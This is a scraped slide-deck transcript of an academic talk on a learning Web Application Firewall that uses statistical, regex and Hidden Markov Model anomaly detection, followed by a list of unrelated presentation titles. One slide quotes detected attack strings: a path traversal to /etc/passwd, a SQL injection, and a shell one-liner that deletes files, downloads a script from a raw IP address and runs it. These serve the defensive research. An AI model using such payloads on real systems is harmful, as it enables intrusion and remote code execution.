Learning Web Application Firewall – Benefits and Caveats

Learning Web Application Firewall – Benefitsand Caveats Dariusz PałkaPedagogicalUniversity of Cracow dpalka@up.krakow.plMarek Zachara University of Science and Technology (AGH) Cracow mzachara@agh.edu.pl

Outline • Introduction – why we need extra securitymechanisms for Web Applications • Learning Web Appliaction Firewall • Implementation • Learning WAF architecture • Data modelsused • Results • Summary

Introduction • 72% of interviewedcompanieshadtheirwebsites/applicationshackedduring the preceeding 24 months. Most successfulattackshappen on the applicationlayer (Barracuda Networks) • Web applicationvulnerabilitiesoutnumberbrowser/OS vulnerabilities by ratio 1:10 (Microsoft Security Intelligence Report) • „More than 13% of all reviewed sites can be completely compromised automatically.About 49% of web applications contain vulnerabilities of high risk level (Urgentand Critical) detected during automatic scanning. However, detailed manual andautomated assessment by a white box method allows to detect these high risklevel vulnerabilities with the probability reaching 80-96%”. (Web Application Security Consortium)

Introduction Unfortunately, governmentalwebsites and applicationsare no exception.The accessdetailsareavailable for sale on the black market.

(source: blog.imperva.com)

Web Application Architecture

Common Attack MethodsAgainst Web Applications • Scriptinjections (especially SQL Injections) • Parametertampering • Forcefulbrowsing • Cross-sitescripting

Security Levels

Rule-based Web Application Firewalls • Problems (disadvantages) • Difficulties in configuring a WAF • Duplication of protectionrules • Constantadjustment of WAF rules

Learning Web Application Firewall Black Box WAF

Learning Patterns • Triggered(supervised) learning (TL) • Benefits: • No need to consider the data retention period size. • No need to storeallhistorical data. • Resistant to attackstargetingits learning process. • Drawabacks • The learning processmust be completed • A WAF must be manualy re-trainedafterchanges in protectedappliaction

Learning Patterns • Continuous (unsupervised) learning (CL) • A WAF willonlyacceptparametervaluesthatmatchrecentusers’ behaviorpatterns • The firewall may be susceptible to speciallyengineeredattacksthat target its learning process

Implementation • WAF isimplemented as Apache Server module • The analysis of incoming POST and GET parameters • Data analysisisconducted on the basis of a multi model approach - similar to the one presented by Giovani Vigna (University of California) and Christopher Krugel (Technical UniversityVienna)

WAF Architecture Server Client Req. processing CORE_IN SSL_IN Request Data Validator HTTP_IN Data Validator Data Collector Model Generator Data Decryptor / Encryptor Req. Data Store Data Models

Length of ParameterValues Someattackattempts, such as cross-sitescripting, directorytraversal and bufferoverflow, containlongcharactersequences, whichmightsignificantlyexceede the number of characters in legitimaterequests, and thisfeatureallows for theireasydetection.

Length of ParameterValues • Chebyshev'sinequality: where: E(x) – expectedvalue of xvar(x) – variance of x • If:(length of parametervalue)where: – currentlyobservedparametervaluelength • We obtain:

Length of ParameterValues E(l)=14.97 var(l)= 6.25 E(l)=15.06 var(l)= 5.99 E(l)=17.71 var(l)= 124.66 E(l)=15.15 var(l)= 13.02

Length of ParameterValues If and Attackscannot be detected

Belonging to PredefinedClasses Examples of classes of parametervaluesdefined with the use of regularexpressions: • A wholenumberwith orwithout a sign (e.g. 123, +56, -78)^[+-]?(0)|([1-9]\d*)$ • A dotseparated real number(e.g 123, 12.3, .3)^([0-9]+\.[0-9]*)|([0-9]*\.[0-9]+)|([0-9]+)$ • A commaseparated real number^([0-9]+,[0-9]*)|([0-9]*,[0-9]+)|([0-9]+)$ • An email address(e.g. somebody@example.org)^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$ • The US currency(e.g. $0.59, $1050, $2,596.99) ^\$(\d{1,3}(\,\d{3})*|(\d+))(\.\d{2})?$ • Http(s) URL (e.g http://example.org, https://example.org/test/abc)^https?\://[a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}(/\S*)*$ • One word^[a-zA-Z]+$ • A simpletext^[a-zA-Z0-9.!?,;”’- \t\n]+$

Belonging to PredefinedClassess • Learning • Ifallvalues from a learning set belong to k-th regularexpressionclass, thisclassisadded to set C (parameterconstrains set) • Testing • The observedvalueistestedifitbelongs to classes - the number of classes (from set C) to which the observedvaluebelongsis i

The Character Distribution • For everycharacterin parametervalues (from a learning set) we calculateanexpectedvalue of relativefrequency and variance of relativefrequences • (relative characterfrequency in i-th parametervalue) = number of occurencescharacter in i-th parametervalue/ length of i-th parametervalue

The Character Distribution

The Character Distribution • Testing • for everycharacter:

ParameterStructuralInference • Structuralinferencemayhelpifsimplemodelsdescribedearlierare not sufficient • In thisapproach the structure of legitimateparametervaluesismodelled as a regularlanguage • We useHiddenMarkov Model to describethisregularlanguage

Ergodic HMM

Parameterstructuralinference • Definitions • O(k) = O(k)1O(k)2…O(k)N – k-th observationsequence • λ = (A,B,π) – HMM model • Learning - adjusting the model parametersλ to maximize • Baum-Welch algorithm (finds the local minima of the likelihoodfunction) • Generating k HMMs with a number of states from 2 to sqrt(N), where N is the number of characters in the longestobservationsequence • A, B and πmatricesarerandomlyinitialised • The HMM with max(

ParameterStructuralInference • Testing • Oobs = O1O2…ON – observationsequence (from incomingrequests) • Calculate P(Oobs|) usingForward-BackwardProcedure ()

AnomalyDetection • After definingparticularmodels, we candetermine the anomalyscore for anobservedparametervalue where: - probability of anobservedparametervalue for a given model m n – number of models

Results • Dataset • 3 independent production Web Servers • 10 total web applications • 3853 parametersanalysed with a totalnumber of values 527070 • Attack queries • 73 queriescollected from our Web Servers • 12 queriesselected from „HTTP-delivered attacks against web servers” Database (http://www.i-pi.com/HTTP-attacks-JoCN-2006/)

Results

Types of AttacksFound by WAF • Examples of attackattemptsfound by our Learning WAF (in parametervalues): • ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd(Directory Traversal) • phpinfo();(ParameterTampering) • ' or 1=1 –(SQL Injection) • //phpMyAdmin2/config/config.inc.php(ForcefulBrowsing) • /../../winnt/system32/logfiles/w3svc1/ex000121.log • cd /tmp;rm -rf font-nix;wget 67.58.79.162/font-nix;perl font-nix

Summary • Benefits of a Learning WAF • Can be easilyextended with new Data Models to improvesecurity • Requiresminimalconfigurationefforts • Can be a supplement for exisitingsecuritysystems • Still TO DO… • Add data modelsthattakeintoconsiderationcorrelationsbetweenparameters in a request (not to treateachparameter as a single one) • Improvestructuralinference (B-W algorithm in a current form istime-consuming, whichmay be a problem in productionenviroments with high traffic) • Improvesupport for a requestcontext (e.g. try to detect and utilsesessionIDs)

THANK YOU

Learning Web Application Firewall – Benefits and Caveats

Learning Web Application Firewall – Benefits and Caveats

Presentation Transcript

Secure Web Site Design

The Costs of Employee Benefits

www.asu.edu/hr/documents/NEOOrientation.ppt

Building a RedHat Linux Firewall – A User Experience

Application Security

Implementing Firewall Technologies

Benefits of Focus Activities

Making Unicenter talk through a Firewall

New Employee Benefits Orientation

Security - Cisco Firewall TRAINING

Talking about the future…

Gene family classification using a semi-supervised learning method

Employee Benefits

Firewalls

eCommerce in MLM Application Status and Benefits

Making Unicenter talk through a Firewall

Chapter 9: Application Design and Development

Security Technology Chapter 8

Securing an Extranet